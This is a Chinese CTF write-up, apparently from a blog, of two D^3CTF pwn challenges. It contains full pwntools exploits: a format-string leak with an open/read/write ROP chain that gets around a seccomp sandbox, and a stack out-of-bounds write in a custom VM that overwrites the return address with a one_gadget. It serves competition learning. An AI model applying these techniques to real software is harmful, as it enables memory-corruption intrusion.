这次 的D^3ctf 又是给吊打 难顶。。。

所以题都是赛后解出来的,在这感谢Peanuts师傅

unprintableV

看看保护:

看看伪代码,其实代码很少

void __cdecl menu()

{

  char *a; // [rsp+8h] [rbp-8h]

  a = buf;

  puts("welcome to d^3CTF!");

  printf("here is my gift: %p\n", &a);

  puts("may you enjoy my printf test!");

  close();

  while ( strncmp(buf, "d^3CTF", 6uLL) && time )

    vuln();

}

漏洞主要在vuln

void __cdecl vuln()

{

  read(, buf, 0x12CuLL);

  printf(buf, buf);

  --time;

}

这里开了 沙箱

禁用了 execve

所以不能调用system getshell

所以应该用 open read  write结合读flag

但是  这里 有close(1)

就算利用 printf的格式化漏洞 读出内容了 ,还是显示不了,但是Peanuts师傅的指点,可以用 把 stdout 覆盖成 stderr  然后就可以输出了 然后就是常规的printf 格式化漏洞,最后 进行栈转移。

exp:

#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

context.arch = "amd64"

def rsl(c1,c2):

    r.recvuntil(c1)

    r.sendline(c2)

def rs(c1,c2):

    r.recvuntil(c1)

    r.send(c2)

def eee_aa(payload):

    global count

    r.send(payload.ljust(300,'\x00'))

    sleep(0.1)

    count = count -1

def set_value(c1,index_,n):

    for i in range(n):

        payload ='%'+str(int(index_+i))+'d%6$hhn'

        eee_aa(payload)

        one_gadget1 = ((c1)>>(i*8))&0xff

        payload = "%"+str(one_gadget1)+"d%10$hhn"

        eee_aa(payload)

for i in range(1000):

    count = 0x64

    #r = process("./unprintableV")

    #r = remote(host,port)

    r=process("./unprintableV")

    r.recvuntil("here is my gift: 0x")

    leak = int(r.recv(12),16)

    print hex(leak)

    index = leak & 0xff

    payload ='%'+str(int(index))+'c%6$hhn'

    eee_aa(payload)

    payload = "%32c%10$hhn"

    eee_aa(payload)

    payload = "%5440c%9$hn"

    eee_aa(payload)

    payload = '%7$p'

    eee_aa(payload)

    try:

        ooo =r.recvuntil("0x",timeout = 0.5)

        if ooo=='':

            r.close()

            continue

    except Exception as e:

        r.close()

        continue

    base_addr=int(r.recv(12),16)-0xafb

    payload = "%15$p"

    print hex(base_addr)

    eee_aa(payload)

    r.recvuntil("0x")

    libc_addr =int(r.recv(12),16)-0x20830

    print hex(libc_addr)

    mprotect_addr = libc.symbols['mprotect']+libc_addr

    pop_rdi = libc_addr + 0x21102

    pop_rsi = libc_addr + 0x202e8

    pop_rdx = libc_addr + 0x1b92

    pop_rcx = libc_addr + 0xea69a

    pop_rax = libc_addr + 0x33544

    syscall = libc_addr + 0xbc375

    rop  =p64(0)

    rop += p64(pop_rdi)

    rop +=p64(base_addr+0x202070)

    rop +=p64(pop_rsi)

    rop +=p64(0)

    rop +=p64(pop_rdx)

    rop +=p64(0)

    rop +=p64(pop_rax)

    rop +=p64(2)

    rop +=p64(syscall)

    #open

    rop +=p64(pop_rdi)

    rop +=p64(1)

    rop +=p64(pop_rsi)

    rop +=p64(base_addr+0x202300)

    rop +=p64(pop_rdx)

    rop +=p64(100)

    rop +=p64(pop_rax)

    rop +=p64(0)

    rop +=p64(syscall)

    #read

    rop +=p64(pop_rdi)

    rop +=p64(2)

    rop +=p64(pop_rsi)

    rop +=p64(base_addr+0x202300)

    rop +=p64(pop_rdx)

    rop +=p64(100)

    rop +=p64(pop_rax)

    rop +=p64(1)

    rop +=p64(syscall)

    set_value(base_addr+0x850,index+0x10,2)

    set_value(base_addr+0x202080,index+0x18,6)

    set_value(base_addr+0x9f8,index+0x20,6)

    #raw_input()

    #set_value(pop_rdi,index+0x10)

    #set_value(leak,index+0x18)

    #set_value(pop_rsi,index+0x20)

    #set_value(0x1000,index+0x28)

    #set_value(pop_rdx,index+0x30)

    #payload ='%'+str(int(index+0x38))+'d%6$hhn'

    #eee_aa(payload)

    #one_gadget1 = 7

    #print hex(one_gadget1)

    #payload = "%"+str(one_gadget1)+"d%10$hhn"

    #eee_aa(payload)

    #set_value(leak,0x40)

    print len(rop)

    sleep(1)

    payload="d^3CTF"

    payload=payload.ljust(0x10,'\x00')

    payload+="flag"

    payload=payload.ljust(0x20,'\x00')

# open('./flag').read(fd,leak+300),write(1,leak+300,0x20)

    payload=payload+rop

    eee_aa(payload)

    #raw_input()

    r.interactive()

    break

babyrop

这道的 保护倒是全开了

然后看看代码

里面定义了一个结构;

  a3->_esp = &v8;

  a3->stack_size = ;

  a3->_ebp = a3->_esp + 0x50;

然后 下面 有一些操作,然后可以看出 这个结构维持了 一个栈堆的结构。

while ( *(*index + code) )

  {

    v4 = *(*index + code);

    switch ( off_14B4 )

    {

      case 0u:

        *index = 0LL;

        return 1LL;

      case 8u:

        push_int(stack, *(++*index + code));

        *index += 4LL;

        break;

      case 0x12u:

        put_char(stack, *(++*index + code));

        ++*index;

        break;

      case 0x15u:

        push_int64(stack, *(++*index + code));

        *index += 8LL;

        break;

      case 0x21u:

        add_0(stack);

        ++*index;

        break;

      case 0x26u:

        add_index(stack, *(++*index + code));

        ++*index;

        break;

      case 0x28u:

        ++*index;

        if ( !stack_sub_0x80(stack, v6) )

          exit();

        return result;

      case 0x30u:

        index_sub(stack, *(++*index + code));

        ++*index;

        break;

      case 0x34u:

        ++*index;

        sub_E17(stack);

        break;

      case 0x38u:

        ++*index;

        set_zero_for(stack);

        break;

      case 0x42u:

        sub_EDF(stack);

        ++*index;

        break;

      case 0x51u:

        add(stack);

        ++*index;

        break;

      case 0x52u:

        sub(stack);

        ++*index;

        break;

      case 0x56u:

        mov_index(stack, *(++*index + code));

        *index += 4LL;

        break;

      default:

        exit();

        return result;

    }

  }

while 里面的指令都是对 这个结构进行读取,pop push  加减 都有

这个漏洞的主要是

signed __int64 __fastcall sub_C26(struc_1 *a1, _QWORD *a2)

{

  if ( !a1->stack_size && *a2 > 1LL )#size是负数的时候 也是不满足的,导致了 栈越界访问,然后可以修改当前栈保存的 返回地址

    return 0LL;

  a1->_esp += 0x50LL;

  a1->stack_size -= ;

  ++*a2;

  return 1LL;

}

我们可以多次 调用这个 函数 。

另外,我们第一输入的256个字符是操作指令,有些指令带参数,有些不带参数。

但很关键的一点是

signed __int64 __fastcall int_mov(struc_1 *a1, int a2)

{

  if ( a1->stack_size > 9u )

    exit();

  a1->_esp -= 8LL;

  *a1->_esp = a2;

  ++a1->stack_size;

  return 1LL;

}

我们 多次调用 sub_C26之后 会导致   a1->stack_size > 9u  不满足。

但是 有这个函数

signed __int64 __fastcall mov_index(struc_1 *a1, int a2)

{

  *a1->_esp = a2;

  return 1LL;

}

虽然 写 4个字节,但是也足够了  因为我们 可以找一个esp指向 0的值,然后赋值,然后再一直调用

signed __int64 __fastcall sub_E17(struc_1 *a1)

{

  struc_1 *v1; // ST08_8

  v1 = a1;

  ++a1->stack_size;

  v1->_esp -= 8LL;

  *v1->_esp = *(v1->_esp + );

  *(a1->_esp + ) = 0LL;

  return 1LL;

}

然后 加上栈上残留的___libc_start_main的地址 就可以获得一个 指向 onegadget的地址,然后就是一样的操作 继续往前面覆盖 最后覆盖掉 返回地址

但是 onegadget 也有条件  就是rsp+0x30为null 那么我们可以调用几次 sub_C26,然后写null

下面是exp

#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'

r = process("./babyrop")

#r = remote(host,port)

def rsl(c1,c2):

    r.recvuntil(c1)

    r.sendline(c2)

def rs(c1,c2):

    r.recvuntil(c1)

    r.send(c2)

sleep(0.5)

payload = '\x28\x12\x12'+'\x28'*2+'\x34'+'\x28'+'\x34'*2+'\x28'+'\x34'*28+'\x56'+p32(0x24a3a)+'\x21'+'\x34'*5+'\x28'

payload = payload.ljust(256,'\x00')

r.send(payload)

r.interactive()

我这次是本地进行调试的 所以libc 可能和比赛有所不一样。。

D^3ctf两道 pwn的更多相关文章

  1. ACM/ICPC 之 欧拉回路两道(POJ1300-POJ1386)

    两道有关欧拉回路的例题 POJ1300-Door Man //判定是否存在从某点到0点的欧拉回路 //Time:0Ms Memory:116K #include<iostream> #in ...

  2. ACM/ICPC 之 Floyd范例两道(POJ2570-POJ2263)

    两道以Floyd算法为解法的范例,第二题如果数据量较大,须采用其他解法 POJ2570-Fiber Network //经典的传递闭包问题,由于只有26个公司可以采用二进制存储 //Time:141M ...

  3. ACM/ICPC 之 SPFA范例两道(POJ3268-POJ3259)

    两道以SPFA算法求解的最短路问题,比较水,第二题需要掌握如何判断负权值回路. POJ3268-Silver Cow Party //计算正逆最短路径之和的最大值 //Time:32Ms Memory ...

  4. ACM/ICPC 之 两道dijkstra练习题(ZOJ1053(POJ1122)-ZOJ1053)

    两道较为典型的单源最短路径问题,采用dijkstra解法 本来是四道练习题,后来发现后面两道用dijkstra来解的话总觉得有点冗余了,因此暂且分成三篇博客(本篇以及后两篇). ZOJ1053(POJ ...

  5. 两道二分coming~

    第一道:poj 1905Expanding Rods 题意:两道墙(距离L)之间架一根棒子,棒子受热会变长,弯曲,长度变化满足公式( s=(1+n*C)*L),求的是弯曲的高度h. 首先来看这个图: ...

  6. JAVA算法两道

    算法(JAVA)----两道小小课后题   LZ最近翻了翻JAVA版的数据结构与算法,无聊之下将书中的课后题一一给做了一遍,在此给出书中课后题的答案(非标准答案,是LZ的答案,猿友们可以贡献出自己更快 ...

  7. 两道面试题,带你解析Java类加载机制

    文章首发于[博客园-陈树义],点击跳转到原文<两道面试题,带你解析Java类加载机制> 在许多Java面试中,我们经常会看到关于Java类加载机制的考察,例如下面这道题: class Gr ...

  8. 【转】两道面试题,带你解析Java类加载机制(类初始化方法 和 对象初始化方法)

    本文转自 https://www.cnblogs.com/chanshuyi/p/the_java_class_load_mechamism.html 关键语句 我们只知道有一个构造方法,但实际上Ja ...

  9. leetcode简单题目两道(2)

    Problem Given an integer, write a function to determine if it is a power of three. Follow up: Could ...

随机推荐

  1. 一次PHP代码上线遇到的问题

    exception ‘CDbException’ with message ‘The table “pms_goods” for active record class “PmsGoods” cann ...

  2. OptimalSolution(2)--二叉树问题(3)Path路径问题

    一.在二叉树中找到累加和为指定值的最长路径长度 给定一棵二叉树和一个32位整数sum,求累加和为sum的最长路径长度.路径是指从某个节点往下,每次最多选择一个孩子节点或者不选所形成的节点链 -3 / ...

  3. c# winform用sharpGL(OpenGl)解析读取3D模型obj

    原文作者:aircraft 原文链接:https://www.cnblogs.com/DOMLX/p/11783026.html 自己写了个简单的类读取解析obj模型,使用导入类,然后new个对象,在 ...

  4. vue+uwsgi+nginx部署luffty项目

    在部署项目之前本人已经将前端代码和后端代码发布在了一个网站上,大家可自行下载,当然如果有Xftp工具也可以直接从本地导入. django代码 https://files.cnblogs.com/fil ...

  5. python购物车小案例

    python购物车小案例# 案列描述:有一个小型水果店里面有水果(苹果:¥8/kg,香蕉:¥5/kg,芒果:¥15/kg,葡萄:¥12/kg),客户带了100元钱进店选购水果.# 1.客户输入相应序号 ...

  6. [springboot 开发单体web shop] 4. Swagger生成Javadoc

    Swagger生成JavaDoc 在日常的工作中,特别是现在前后端分离模式之下,接口的提供造成了我们前后端开发人员的沟通 成本大量提升,因为沟通不到位,不及时而造成的[撕币]事件都成了日常工作.特别是 ...

  7. 学习笔记41_Spring.Net

    Spring.Net:由容器负责创建对象,容器读取配置文件来初始化对象,配置文件须符合 Spring.Net范式: 准备材料: Common.Loggin.dll,Spring.Core.dll 第一 ...

  8. Mokia(三维偏序)P4390

    提到cdq,就不得不提这道该死的,挨千刀的题目了. 极简题面: 给定一个二维平面,在ti时刻会在(xi,yi)放一个点,会在tj时刻查询一个方框里面的点的数量 看道题就是二维线段树乱搞啊,这么水??? ...

  9. NOIP模拟14-16

    最近事情有些多,先咕了! 鸽了,时间太久远了,写了话坑太大,太费时间了!

  10. Linux | 性能分析系列学习 (1)

    学习重点: 把观察到的性能问题跟系统原理关联起来,特别是把系统从应用程序.库函数.系统调用.再到内核和硬件等不同的层级贯穿起来. 主要是四个方面:CPU 性能.磁盘 I/O 性能.内存性能以及网络性能 ...